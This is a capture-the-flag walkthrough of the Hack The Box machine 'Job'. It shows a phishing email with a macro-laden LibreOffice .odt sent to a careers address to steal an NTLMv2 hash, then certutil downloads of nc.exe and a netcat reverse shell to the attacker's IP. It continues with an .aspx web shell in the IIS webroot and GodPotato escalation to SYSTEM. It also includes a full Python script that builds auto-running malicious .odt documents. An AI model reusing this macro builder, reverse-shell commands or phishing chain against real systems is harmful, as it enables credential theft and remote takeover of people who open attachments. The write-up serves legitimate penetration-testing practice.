Enumeration
nmap
┌──(kali㉿kali)-[~/Desktop/htb/Job]
└─$ sudo nmap -sT -sV -sC 10.129.234.73 -oA nmap/nmap
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-25 16:08 CEST
Nmap scan report for 10.129.234.73
Host is up (0.086s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Job.local
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: JOB
| NetBIOS_Domain_Name: JOB
| NetBIOS_Computer_Name: JOB
| DNS_Domain_Name: job
| DNS_Computer_Name: job
| Product_Version: 10.0.20348
|_ System_Time: 2025-10-25T14:09:40+00:00
|_ssl-date: 2025-10-25T14:10:20+00:00; +29s from scanner time.
| ssl-cert: Subject: commonName=job
| Not valid before: 2025-09-04T13:43:05
|_Not valid after: 2026-03-06T13:43:05
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: 28s, deviation: 0s, median: 27s
| smb2-time:
| date: 2025-10-25T14:09:46
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.45 seconds
The nmap scan shows several interesting ports.
SMTP (hMailServer) is listening on port 25 and IIS 10.0 on port 80. Besides that, port 445 (SMB), port 3389 (RDP) and port 5985 (WinRM) are open; those will mostly matter after a foothold, once I have credentials. One detail worth noting from the banner: the SMTP server lists its supported commands, including VRFY, which can help to confirm mailboxes. I’ll focus on port 25 and port 80.
Website
Upon opening the website I discover that the target company is looking for new developers. Applicants should e-mail their documents to career@job.local as a .pdf or .odt. The latter is the interesting one.
.odt is the LibreOffice Writer format, and Writer documents can carry embedded Basic macros, much like Office documents carry VBA.
So my first idea is to send a malicious .odt, capture an NTLMv2 hash when it is opened, crack it and use the credentials for a foothold.
Getting the hash
Creating a malicious .odt
Creating the malicious macro is simple: I’ll use the Basic Shell() function to run a command that connects to an SMB share on my host. Windows authenticates to that share with the credentials of whoever opens the document, and Responder on my side captures the NTLMv2 response.
REM ***** BASIC *****
' Bind this Sub to the document's "Open Document" event so it runs on load.
Sub Main
    ' Maps a drive to the attacker's share; Windows authenticates with the
    ' opening user's credentials, which Responder captures as NTLMv2.
    Shell("cmd.exe /c net use * \\10.10.14.192\share")
End Sub
Two things are important: the macro must be bound to the document’s Open Document event (Tools > Customize > Events, saved in the document) so that it runs on opening, and Macro Security (Tools > Options > LibreOffice > Security) must be set to Low, otherwise LibreOffice blocks document macros. The security level is a setting of the machine that opens the file, so whether the macro fires on the target depends on the target’s configuration; the next section shows that here it does.
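To make the first stage reproducible without clicking through the LibreOffice GUI, here is an added example (not from the original post) that writes the same Shell() macro into a minimal .odt and binds it to the Open Document event. It assumes that this minimal package layout (mimetype, manifest, content.xml carrying the event listener, and the Basic library files) is enough for LibreOffice Writer to load and run the macro; the attacker address, the command and the file name are the post’s, everything else is assumed.

```python
"""Build a minimal .odt that runs a Basic Shell() command on the Open Document event.

Added example, not the original post's workflow (which used the LibreOffice GUI).
Assumption: this minimal package layout is accepted by LibreOffice Writer. Whether
the macro actually runs on the target depends on the target's macro security setting.
"""
import io
import zipfile
from xml.sax.saxutils import escape

ATTACKER = "10.10.14.192"   # attacker host from the post

MIMETYPE = b"application/vnd.oasis.opendocument.text"

MANIFEST = """<?xml version="1.0" encoding="UTF-8"?>
<manifest:manifest xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0" manifest:version="1.3">
 <manifest:file-entry manifest:full-path="/" manifest:media-type="application/vnd.oasis.opendocument.text"/>
 <manifest:file-entry manifest:full-path="content.xml" manifest:media-type="text/xml"/>
 <manifest:file-entry manifest:full-path="Basic/script-lc.xml" manifest:media-type="text/xml"/>
 <manifest:file-entry manifest:full-path="Basic/Standard/script-lb.xml" manifest:media-type="text/xml"/>
 <manifest:file-entry manifest:full-path="Basic/Standard/Module1.xml" manifest:media-type="text/xml"/>
</manifest:manifest>
"""

# The event binding lives in content.xml: "dom:load" is the Open Document event and the
# href addresses Sub Main in library Standard, module Module1, stored inside the document.
CONTENT = """<?xml version="1.0" encoding="UTF-8"?>
<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
 xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0"
 xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0"
 xmlns:xlink="http://www.w3.org/1999/xlink" office:version="1.3">
 <office:scripts><office:event-listeners>
  <script:event-listener script:language="ooo:script" script:event-name="dom:load"
   xlink:href="vnd.sun.star.script:Standard.Module1.Main?language=Basic&amp;location=document"
   xlink:type="simple"/>
 </office:event-listeners></office:scripts>
 <office:body><office:text><text:p>Please find my resume attached.</text:p></office:text></office:body>
</office:document-content>
"""

SCRIPT_LC = """<?xml version="1.0" encoding="UTF-8"?>
<library:libraries xmlns:library="http://openoffice.org/2000/library" xmlns:xlink="http://www.w3.org/1999/xlink">
 <library:library library:name="Standard" library:link="false"/>
</library:libraries>
"""

SCRIPT_LB = """<?xml version="1.0" encoding="UTF-8"?>
<library:library xmlns:library="http://openoffice.org/2000/library" library:name="Standard"
 library:readonly="false" library:passwordprotected="false">
 <library:element library:name="Module1"/>
</library:library>
"""

MODULE = """<?xml version="1.0" encoding="UTF-8"?>
<script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic">
{code}</script:module>
"""


def basic_macro(command: str) -> str:
    """Basic source for a Sub Main that runs `command` through Shell()."""
    quoted = command.replace('"', '""')   # Basic doubles a literal quote inside a string
    return f'Sub Main\n    Shell("{quoted}")\nEnd Sub\n'


def odt_parts(command: str) -> dict:
    """Zip member name -> bytes for a Writer document that runs `command` when opened."""
    code = escape(basic_macro(command))   # '&', '<' and '>' must be XML-escaped in Module1.xml
    return {
        "mimetype": MIMETYPE,
        "META-INF/manifest.xml": MANIFEST.encode(),
        "content.xml": CONTENT.encode(),
        "Basic/script-lc.xml": SCRIPT_LC.encode(),
        "Basic/Standard/script-lb.xml": SCRIPT_LB.encode(),
        "Basic/Standard/Module1.xml": MODULE.format(code=code).encode(),
    }


def build_macro_odt(command: str, path: str = "") -> bytes:
    """Assemble the package: 'mimetype' has to be the first member and stored uncompressed."""
    parts = odt_parts(command)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("mimetype", parts["mimetype"], compress_type=zipfile.ZIP_STORED)
        for name, data in parts.items():
            if name != "mimetype":
                z.writestr(name, data, compress_type=zipfile.ZIP_DEFLATED)
    data = buf.getvalue()
    if path:
        with open(path, "wb") as f:
            f.write(data)
    return data


if __name__ == "__main__":
    # First-stage payload from the post: force an SMB connection to the attacker's share.
    build_macro_odt(f"cmd.exe /c net use * \\\\{ATTACKER}\\share", "application.odt")
```

Running the script writes application.odt; unzip -l shows mimetype as the first, uncompressed member, which is what ODF consumers check before they look at anything else. The same builder produces the later stages by swapping the command string.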
Delivery
To catch the NTLMv2 Hash I’ll start Responder.
┌──(kali㉿kali)-[~/Desktop/htb/Job]
└─$ sudo responder -I tun0
I’ll use sendemail to send the malicious .odt to career@job.local. As the target runs its own SMTP server for job.local, I’ll point sendemail straight at it as the relay.
┌──(kali㉿kali)-[~/Desktop/htb/Job]
└─$ sendemail -f applicant@applicant.htb -t career@job.local -u "My Application" -m "Heres my Resume." -a application.odt -s 10.129.234.73:25
Oct 26 17:45:03 kali sendemail[3881]: Email was sent successfully!
Shortly after the e-mail is delivered, Responder reports the capture:
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.234.73
[SMB] NTLMv2-SSP Username : JOB\jack.black
[SMB] NTLMv2-SSP Hash : jack.black::JOB:27915511c5e1c97c:…
Responder captures the NTLMv2 hash. Unfortunately cracking it did not succeed. Still, the capture tells me two useful things: somebody (jack.black) opens the attachment with macros enabled, and Shell() does execute arbitrary commands on the target.
I’ll try to get a RevShell next.
Getting a RevShell
Creating another malicious .odt
My plan is to first download nc.exe from my host with one malicious .odt, and then start nc.exe with a second one to get a reverse shell. This could almost certainly be done with a single document, but I chose to create two.
The first step is a macro that downloads nc.exe. For that, I copy nc.exe into my http directory and start a Python web server there.
┌──(kali㉿kali)-[~/Desktop/htb/Job/http]
└─$ cp /usr/share/windows-binaries/nc.exe .
I’ll then use certutil.exe inside the Shell() function to download nc.exe. The destination path contains no spaces, so it needs no quoting (and cmd.exe only treats double quotes as quote characters anyway):
certutil.exe -urlcache -split -f http://10.10.14.192/nc.exe C:\Windows\Temp\nc.exe
The e-mail is sent with sendemail exactly as before.
After a couple of seconds the web server log shows that the target downloaded nc.exe:
┌──(kali㉿kali)-[~/Desktop/htb/Job/http]
└─$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.234.73 - - [26/Oct/2025 18:36:57] "GET /nc.exe HTTP/1.1" 200 -
10.129.234.73 - - [26/Oct/2025 18:36:57] "GET /nc.exe HTTP/1.1" 200 -
Now I’ll create another .odt which starts nc.exe and connects back to my listener. The command inside the Shell() function is:
cmd.exe /c C:\Windows\Temp\nc.exe 10.10.14.192 9001 -e cmd.exe
Before sending the email, I’ll start listening for connections on Port 9001:
┌──(kali㉿kali)-[~/Desktop/htb/Job]
└─$ rlwrap nc -lnvp 9001
listening on [any] 9001 ...
After successfully delivering the e-mail I get a RevShell as jack.black:
┌──(kali㉿kali)-[~/Desktop/htb/Job]
└─$ rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.192] from (UNKNOWN) [10.129.234.73] 58872
Microsoft Windows [Version 10.0.20348.4052]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files\LibreOffice\program>whoami
whoami
job\jack.black
I’ll quickly grab the user.txt and then move on to PrivEsc.
C:\Users\jack.black\Desktop> more user.txt
more user.txt
c54...
Privilege Escalation
Access as iis apppool\defaultapppool
The compromised user jack.black is a member of the developers group, which has write access to C:\inetpub\wwwroot, the IIS webroot. IIS executes .aspx pages under the application pool identity, so dropping an .aspx reverse shell into the webroot and requesting it should give me a shell as the IIS AppPool user.
There are many .aspx reverse shells around; I’ll use this one: https://gist.github.com/qtc-de/19dfc9018685fce1ba2092c8e2382a79
I download the shell to my host and adjust the IP and port, start nc to listen for connections, fetch the shell onto the target with certutil, and then trigger it via the browser.
C:\inetpub\wwwroot>certutil.exe -urlcache -f http://10.10.14.192/rev.aspx rev.aspx
certutil.exe -urlcache -f http://10.10.14.192/rev.aspx rev.aspx
**** Online ****
CertUtil: -URLCache command completed successfully.
Starting to listen on port 9002:
┌──(kali㉿kali)-[~/Desktop/htb/Job]
└─$ rlwrap nc -lnvp 9002
listening on [any] 9002 ...
Then I’ll request the page in my browser: http://10.129.234.73/rev.aspx
And there it is, a shell as iis apppool\defaultapppool:
┌──(kali㉿kali)-[~/Desktop/htb/Job]
└─$ rlwrap nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.192] from (UNKNOWN) [10.129.234.73] 58885
Microsoft Windows [Version 10.0.20348.4052]
(c) Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
Abusing SeImpersonatePrivilege
iis apppool\defaultapppool has SeImpersonatePrivilege enabled, as is typical for IIS application pool identities:
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
With SeImpersonatePrivilege available this is a textbook potato-style privilege escalation: I’ll fetch GodPotato and run it. GodPotato ships as separate builds per .NET runtime; the NET2 build is the one I use here.
Firstly I’ll download it to the target:
C:\Users\Public\Downloads>certutil.exe -urlcache -f http://10.10.14.192/GodPotato-NET2.exe GodPotato-NET2.exe
certutil.exe -urlcache -f http://10.10.14.192/GodPotato-NET2.exe GodPotato-NET2.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
I’ll start a third listener on port 9003 and then run GodPotato, reusing the nc.exe already in C:\Windows\Temp:
C:\Users\Public\Downloads>GodPotato-NET2.exe -cmd "cmd /c C:\Windows\Temp\nc.exe 10.10.14.192 9003 -e cmd.exe"
And there is my NT AUTHORITY\SYSTEM shell:
connect to [10.10.14.192] from (UNKNOWN) [10.129.234.73] 58906
Microsoft Windows [Version 10.0.20348.4052]
(c) Microsoft Corporation. All rights reserved.
C:\Users\Public\Downloads>whoami
whoami
nt authority\system
I’ll grab the flag and call it a day.
C:\Users\Administrator\Desktop>more root.txt
more root.txt
309..